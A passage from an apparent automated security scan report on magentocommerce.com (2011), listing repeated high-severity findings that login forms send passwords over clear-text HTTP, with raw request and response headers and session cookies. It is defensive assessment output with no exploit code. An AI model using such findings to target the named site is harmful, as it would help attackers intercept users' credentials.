User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170899; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.3.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313170909; expires=Sat, 11-Aug-2012 13:41:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:50 GMT
Content-Length: 37734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.57. http://www.magentocommerce.com/media/interviews/alpedia/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/alpedia/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/alpedia/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175966; expires=Sat, 11-Aug-2012 15:06:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Falpedia%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 38228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.58. http://www.magentocommerce.com/media/interviews/bright-light-media/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/bright-light-media/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/bright-light-media/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175934; expires=Sat, 11-Aug-2012 15:05:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fbright-light-media%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:34 GMT
Content-Length: 39078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.59. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/buettenpapierfabrik-gmund/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/buettenpapierfabrik-gmund/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175956; expires=Sat, 11-Aug-2012 15:05:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Finterviews%2Fbuettenpapierfabrik-gmund%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:56 GMT
Content-Length: 37720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.60. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/jack-wolfskin/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/jack-wolfskin/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175910; expires=Sat, 11-Aug-2012 15:05:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fmedia%2Finterviews%2Fjack-wolfskin%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:10 GMT
Content-Length: 39204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.61. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/liaison-dangereuse/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/liaison-dangereuse/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175958; expires=Sat, 11-Aug-2012 15:05:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fliaison-dangereuse%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:58 GMT
Content-Length: 37866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.62. http://www.magentocommerce.com/media/interviews/lodger-footwear/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/lodger-footwear/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/lodger-footwear/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175884; expires=Sat, 11-Aug-2012 15:04:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Finterviews%2Flodger-footwear%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:44 GMT
Content-Length: 37831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.63. http://www.magentocommerce.com/media/interviews/man-junk/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/man-junk/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/man-junk/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175946; expires=Sat, 11-Aug-2012 15:05:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fman-junk%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:47 GMT
Content-Length: 37429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.64. http://www.magentocommerce.com/media/interviews/nerdyshirts/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/nerdyshirts/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/nerdyshirts/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175960; expires=Sat, 11-Aug-2012 15:06:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fmedia%2Finterviews%2Fnerdyshirts%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:00 GMT
Content-Length: 37004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.65. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A70%3A%22%2Fmedia%2Finterviews%2Fquadra-informatique-and-anneau-du-rhin-society%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 38775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.66. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/sbs-broadcasting/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/sbs-broadcasting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175905; expires=Sat, 11-Aug-2012 15:05:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fmedia%2Finterviews%2Fsbs-broadcasting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:05 GMT
Content-Length: 38327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.67. http://www.magentocommerce.com/media/interviews/shoebacca/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/shoebacca/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/shoebacca/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175973; expires=Sat, 11-Aug-2012 15:06:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Finterviews%2Fshoebacca%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:13 GMT
Content-Length: 37269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.68. http://www.magentocommerce.com/media/interviews/signing-time/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/signing-time/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/signing-time/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175964; expires=Sat, 11-Aug-2012 15:06:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Finterviews%2Fsigning-time%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:04 GMT
Content-Length: 39390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.69. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/stella-lena-ny/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/stella-lena-ny/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175974; expires=Sat, 11-Aug-2012 15:06:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Fstella-lena-ny%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:15 GMT
Content-Length: 39153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.70. http://www.magentocommerce.com/media/interviews/timeout-online/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
